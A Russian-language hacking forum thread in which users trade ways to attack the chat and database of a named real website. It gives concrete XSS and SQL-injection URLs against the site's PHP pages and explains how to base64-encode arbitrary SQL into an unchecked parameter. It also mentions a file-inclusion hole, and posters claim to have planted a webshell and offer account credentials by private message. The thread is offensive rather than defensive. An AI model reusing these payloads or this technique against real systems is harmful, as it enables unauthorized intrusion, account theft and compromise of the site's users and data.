Так вот мне интересно узнать, какие есть уязвимости для чатов на php. Обычные пользователи ничего сделать немогут, но админы и модеры могут вставлять картинки, писать большими биквами и т.п. А обычный пользователь так сможет? Можно ли взломать как-нибудь??
кидай сюда ссылку, я так понимаю что тебя определённый чат интересует? все чаты разные => уязвимости тоже разные
чел свои не дам)) но у мя там ник завалялся... ща... логин Vaz***** пас ********** ----------------- за логином и пассом стучите в ПМ
вот по быстрому нашёл... http://energyfm.ru/chat/history.php?idchat=energy&what="><script>alert(document.cookie)</script> http://energyfm.ru/chat/history.php?idchat=' http://energyfm.ru/chat/getnewmes.php?idchat=' вот как сообщение выглядят в коде... parent.window.tickerDiv.innerHTML+'<p style="color: br;"><b><font color="#0000FF">Vaz21043</font></b> : \'<>()\'"</p>'; сдесь можно посмотреть все сообщения в коде... http://energyfm.ru/chat/getnewmes.php?idchat=energy не забудь про репутацию (слева плюсик нажми зелёненький)
Слух, а до меня что-то не допело. А как пистаь большими буквами. под наклоном.. и т.п. ? На плесик ОБЯЗАТЕЛЬНО нажму.
Только что нашел дыру, статус : критическая, залил вебшелл...тут выкладывать не буду, на всяк случай.....Va_RuS , стучи в ПМ
Чат и вообще этот форум лично мне показались очень интересными - просто рай, от инклуда до скуль инжа в base64 кодировке. Вообщем инклуд все увидели, а такой запрос для меня оказался более интересным: Code: http://energyfm.ru/?an=foto_slu&condition=czIgbGlrZSAnTG9uZG9uLCBFbmdsYW5kJSc%3D теперь самое интересное - расшифровка переменной condition. Сам первый раз такое вижу, но вот condition=s2 like 'London, England%' - забавно))) запрос сразу передаётся в базу подаётся вообще без проверок!!! это что-то! а теперь вбиваем нужнй нам запрос и кодируем в base64, подставляем и будет счастье. --- ЗЫ Буду есчо лазить по сайту, очень уж понравилось